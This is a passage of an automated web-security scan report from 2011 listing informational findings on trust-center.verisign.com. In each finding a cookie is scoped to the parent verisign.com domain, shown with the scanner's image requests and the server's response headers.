Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/arrow_progressBar_red.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/arrow_progressBar_red.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=6931148CDB2A10DB6A89CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 90
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.........3....d.....2Y........!.......,...........(e.......RR.L...}Z..XF.M4..
.M..;

9.44. https://trust-center.verisign.com/rcm/verisign/images/divider.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/divider.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/divider.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=685A0CDADB2A10DB6A86CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..
..........!.......,......
........;

9.45. https://trust-center.verisign.com/rcm/verisign/images/ico_questionmark.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/ico_questionmark.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/ico_questionmark.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=6778D440DB2A10DB44B3B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:05 GMT
Accept-Ranges: bytes
Content-Length: 374
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a.....-......8..F.#O.....I.=.2Q.Wu..:...............1Z.\}.*U..B.%K.Bh....Mn....-Q....x.....n..{..n..h}.........................x.....q...4.......................................................
...[SNIP]...

9.46. https://trust-center.verisign.com/rcm/verisign/images/logo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/logo.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/logo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 16073
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..=...............................................................................................................................................................................................
...[SNIP]...

9.47. https://trust-center.verisign.com/rcm/verisign/images/popup_button_left.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_left.gif

Issue detail

The application issued a cookie that is scoped to a parent of the issuing domain (see the Set-Cookie header with a Domain attribute in the response below). The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_left.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6856446ADB2A10DB44B6B1847A7DDBAF; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 348
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

GIF89a..................................................................................................................................................................................................
...[SNIP]...

9.48. https://trust-center.verisign.com/rcm/verisign/images/popup_button_right.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/popup_button_right.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/popup_button_right.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68595EDEDB2A10DB4CFE9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 344
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.49. https://trust-center.verisign.com/rcm/verisign/images/pricebox_bg.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/pricebox_bg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/pricebox_bg.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=68501C2ADB2A10DB4CFB9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 13169
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.50. https://trust-center.verisign.com/rcm/verisign/images/sm_004276_oo.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/sm_004276_oo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/sm_004276_oo.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:42 GMT
Server: Apache
Set-Cookie: TLTHID=69307022DB2A10DB4D009F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.51. https://trust-center.verisign.com/rcm/verisign/images/truste.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/truste.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/truste.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:40 GMT
Server: Apache
Set-Cookie: TLTHID=6860A20CDB2A10DB4CFF9F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 2232
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.52. https://trust-center.verisign.com/rcm/verisign/images/tsTermArrow.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermArrow.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermArrow.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EA4F6DB2A10DB6A7ECEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 71
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

9.53. https://trust-center.verisign.com/rcm/verisign/images/tsTermBgM.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermBgM.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermBgM.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677EB162DB2A10DB6A80CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Content-Length: 956
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

...[SNIP]...

9.54. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtB.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtB.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtB.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=67861F74DB2A10DB6A81CEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 978
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.55. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.gif HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=666769EADB2A10DB44B1B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:39 GMT
Server: Apache
Set-Cookie: TLTHID=677CD43CDB2A10DB4CF39F6CAED9DACC; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:06 GMT
Accept-Ranges: bytes
Content-Length: 997
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/gif

...[SNIP]...

9.56. https://trust-center.verisign.com/rcm/verisign/images/tsTermWtT.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /rcm/verisign/images/tsTermWtT.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /rcm/verisign/images/tsTermWtT.jpg HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Referer: https://trust-center.verisign.com/process/retail/trust_product_selector;jsessionid=8EDEEDCA5D5FDB78FD13458CCB776941?uid=51ed60d582dab5b65c3163309fa7184c&product=TRUSTSEAL001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
